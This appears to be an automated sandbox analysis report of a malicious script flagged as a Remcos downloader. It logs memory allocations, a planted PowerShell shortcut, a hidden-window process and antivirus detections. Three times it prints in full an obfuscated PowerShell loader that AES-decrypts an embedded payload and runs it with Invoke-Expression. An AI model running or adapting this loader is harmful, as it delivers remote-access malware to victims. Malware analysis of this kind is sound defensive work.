NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02972000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02603000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02604000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02605000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02606000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05001000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05002000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05003000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05004000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05005000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05006000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05007000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05008000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05009000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31288118537265901671092296545801CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI9qzw9rWNQXNXTkOMi91Vo37XNXwKsDkID6RFqNMIb+XDhn4Y5AbEg30f25b/EyGdGGjWsHDIIox1WuVuUdOUadjhme+5zvVV44oiyworfCO2lfsB1IQVwYt2W3SwF0Ux7M7imAEKs79W60z/0ynAsj8hj2vt/lnFQIiUMLXwxtg0ygxaA1q2xZSJwwSMDWyzIontKVe2xHt1HI77rYSt/VnOayqQ2yg7Mp48pY+uj2EZP74FtBnkcE9p92gZJxz+peJ+AKTzl7JeqJQuodXWFmK9sgGK4n13RybKFC+dVb8O8Krc/u05EdmP8zqWyMN4CIIIo6bc+uy3dadl98BZbD0z03uf3Oz6xO+gLfn9tOR1YKsukLXT2OScPDC2jP9f9Yqq+KSXQNHugPnILvW7k+DBL1ZjUxKLNlvCe0NOpwgh8+75a/DTYGBpNBdkSv6BeMFiZTOcAGGEAB5TlZIOZzRTBw8GIX57ryKhBD+OOgtPd2gLFQriTRl2LIoUqCZ1NdzqGQpGwwf4BXbnED2n7yIY2OKKYAovsduKNeTRlypT3jEkMxq1Z51SmOLPNtSqgYjTlhY1Pf+4wEgtf5RvJnRdkbil32H7SckZeqIf4a57uzHIqbcG+bjJT0/Q8jk0lXBCRIMGQd1Frr3sKLigZVlZV51M8hR24sv8ALa2EgO+gSMuthSXw3J2JazJgRKFhsjaMNJMFeeAuPC9u3bhyNRUUxtNbaEkf5p/2U/Td9f3luetP2LV6G1qctY5iGj1puWd+7Oa1A9Jx8sKWBfK7ssUEzfA5tRfwJs+Yig4neb6zjDL+RrpEHNFlkE8+TDOUhcNUOaaxmdagb669MaY6AUHuBGbW4T3clqQY3KqMWiWxvWFBjhAXh4oSmZFSY/+TaEY+Bjm7AbSBTspTWmyfY2HbT2L5cOwDGAAmIx3UR2NUByK70uEAvM2Yz5ioHv8hB18Qc2MMkbxqSrhFr41oRCPhdCx89cUfnKhXUDDd2TkPICClvjRXaMqZ9/NY0GbTYZhUyGeiljzB9o333Pd4tXJeCeAXf7pdSIB5lulheY+jHzCGimEp3VVl2AkjOwPbeoJhwjAUV22t+K1mLSHCLkb+kxdZ8PTVzqfErU5M/wAcukzKiEIWL67nmNrbrCQr0n4yiBww55JzH6QlqH4bo8R3wkrh+6GeX2DuozRIcrO+EJkFIyPGqzNOLbPmOMp2ywAQFZmKLtSNxMb1p4gtH1hzuGDw855hxFyyAs5y4m0NtXFrTGbDRUXgJ0rYRgPSAr/DFlNfYC4xRFI4A4HllUDOPIr2vsL8x87drooa8oqLFJuRFU8yqTyYdo3WNhu0QjHhbWlwKo+VZRctR1fsH+/yM/e99xk2kRcHOemzLzjSfiD4PKV4nvV6jwTReR+4NtyQtYW+KGUdbNqX7Wd4A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31288118537265901671092296545801CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI9qzw9rWNQXNXTkOMi91Vo37XNXwKsDkID6RFqNMIb+XDhn4Y5AbEg30f25b/EyGdGGjWsHDIIox1WuVuUdOUadjhme+5zvVV44oiyworfCO2lfsB1IQVwYt2W3SwF0Ux7M7imAEKs79W60z/0ynAsj8hj2vt/lnFQIiUMLXwxtg0ygxaA1q2xZSJwwSMDWyzIontKVe2xHt1HI77rYSt/VnOayqQ2yg7Mp48pY+uj2EZP74FtBnkcE9p92gZJxz+peJ+AKTzl7JeqJQuodXWFmK9sgGK4n13RybKFC+dVb8O8Krc/u05EdmP8zqWyMN4CIIIo6bc+uy3dadl98BZbD0z03uf3Oz6xO+gLfn9tOR1YKsukLXT2OScPDC2jP9f9Yqq+KSXQNHugPnILvW7k+DBL1ZjUxKLNlvCe0NOpwgh8+75a/DTYGBpNBdkSv6BeMFiZTOcAGGEAB5TlZIOZzRTBw8GIX57ryKhBD+OOgtPd2gLFQriTRl2LIoUqCZ1NdzqGQpGwwf4BXbnED2n7yIY2OKKYAovsduKNeTRlypT3jEkMxq1Z51SmOLPNtSqgYjTlhY1Pf+4wEgtf5RvJnRdkbil32H7SckZeqIf4a57uzHIqbcG+bjJT0/Q8jk0lXBCRIMGQd1Frr3sKLigZVlZV51M8hR24sv8ALa2EgO+gSMuthSXw3J2JazJgRKFhsjaMNJMFeeAuPC9u3bhyNRUUxtNbaEkf5p/2U/Td9f3luetP2LV6G1qctY5iGj1puWd+7Oa1A9Jx8sKWBfK7ssUEzfA5tRfwJs+Yig4neb6zjDL+RrpEHNFlkE8+TDOUhcNUOaaxmdagb669MaY6AUHuBGbW4T3clqQY3KqMWiWxvWFBjhAXh4oSmZFSY/+TaEY+Bjm7AbSBTspTWmyfY2HbT2L5cOwDGAAmIx3UR2NUByK70uEAvM2Yz5ioHv8hB18Qc2MMkbxqSrhFr41oRCPhdCx89cUfnKhXUDDd2TkPICClvjRXaMqZ9/NY0GbTYZhUyGeiljzB9o333Pd4tXJeCeAXf7pdSIB5lulheY+jHzCGimEp3VVl2AkjOwPbeoJhwjAUV22t+K1mLSHCLkb+kxdZ8PTVzqfErU5M/wAcukzKiEIWL67nmNrbrCQr0n4yiBww55JzH6QlqH4bo8R3wkrh+6GeX2DuozRIcrO+EJkFIyPGqzNOLbPmOMp2ywAQFZmKLtSNxMb1p4gtH1hzuGDw855hxFyyAs5y4m0NtXFrTGbDRUXgJ0rYRgPSAr/DFlNfYC4xRFI4A4HllUDOPIr2vsL8x87drooa8oqLFJuRFU8yqTyYdo3WNhu0QjHhbWlwKo+VZRctR1fsH+/yM/e99xk2kRcHOemzLzjSfiD4PKV4nvV6jwTReR+4NtyQtYW+KGUdbNqX7Wd4A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 24, 2024, 9:11 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31288118537265901671092296545801CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI9qzw9rWNQXNXTkOMi91Vo37XNXwKsDkID6RFqNMIb+XDhn4Y5AbEg30f25b/EyGdGGjWsHDIIox1WuVuUdOUadjhme+5zvVV44oiyworfCO2lfsB1IQVwYt2W3SwF0Ux7M7imAEKs79W60z/0ynAsj8hj2vt/lnFQIiUMLXwxtg0ygxaA1q2xZSJwwSMDWyzIontKVe2xHt1HI77rYSt/VnOayqQ2yg7Mp48pY+uj2EZP74FtBnkcE9p92gZJxz+peJ+AKTzl7JeqJQuodXWFmK9sgGK4n13RybKFC+dVb8O8Krc/u05EdmP8zqWyMN4CIIIo6bc+uy3dadl98BZbD0z03uf3Oz6xO+gLfn9tOR1YKsukLXT2OScPDC2jP9f9Yqq+KSXQNHugPnILvW7k+DBL1ZjUxKLNlvCe0NOpwgh8+75a/DTYGBpNBdkSv6BeMFiZTOcAGGEAB5TlZIOZzRTBw8GIX57ryKhBD+OOgtPd2gLFQriTRl2LIoUqCZ1NdzqGQpGwwf4BXbnED2n7yIY2OKKYAovsduKNeTRlypT3jEkMxq1Z51SmOLPNtSqgYjTlhY1Pf+4wEgtf5RvJnRdkbil32H7SckZeqIf4a57uzHIqbcG+bjJT0/Q8jk0lXBCRIMGQd1Frr3sKLigZVlZV51M8hR24sv8ALa2EgO+gSMuthSXw3J2JazJgRKFhsjaMNJMFeeAuPC9u3bhyNRUUxtNbaEkf5p/2U/Td9f3luetP2LV6G1qctY5iGj1puWd+7Oa1A9Jx8sKWBfK7ssUEzfA5tRfwJs+Yig4neb6zjDL+RrpEHNFlkE8+TDOUhcNUOaaxmdagb669MaY6AUHuBGbW4T3clqQY3KqMWiWxvWFBjhAXh4oSmZFSY/+TaEY+Bjm7AbSBTspTWmyfY2HbT2L5cOwDGAAmIx3UR2NUByK70uEAvM2Yz5ioHv8hB18Qc2MMkbxqSrhFr41oRCPhdCx89cUfnKhXUDDd2TkPICClvjRXaMqZ9/NY0GbTYZhUyGeiljzB9o333Pd4tXJeCeAXf7pdSIB5lulheY+jHzCGimEp3VVl2AkjOwPbeoJhwjAUV22t+K1mLSHCLkb+kxdZ8PTVzqfErU5M/wAcukzKiEIWL67nmNrbrCQr0n4yiBww55JzH6QlqH4bo8R3wkrh+6GeX2DuozRIcrO+EJkFIyPGqzNOLbPmOMp2ywAQFZmKLtSNxMb1p4gtH1hzuGDw855hxFyyAs5y4m0NtXFrTGbDRUXgJ0rYRgPSAr/DFlNfYC4xRFI4A4HllUDOPIr2vsL8x87drooa8oqLFJuRFU8yqTyYdo3WNhu0QjHhbWlwKo+VZRctR1fsH+/yM/e99xk2kRcHOemzLzjSfiD4PKV4nvV6jwTReR+4NtyQtYW+KGUdbNqX7Wd4A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)\|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') filepath: powershell.exe	1	1	0

File has been identified by 7 AntiVirus engines on VirusTotal as malicious (7 events)

Symantec	ISB.Downloader!gen40
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
NANO-Antivirus	Trojan.Script.Vbs-heuristic.druvzi
Microsoft	Trojan:VBS/Remcos.RTDC!MTB
ZoneAlarm	HEUR:Trojan-Downloader.Script.Generic
AVG	Script:SNH-gen [Trj]

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 24, 2024, 9:11 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (3 events)

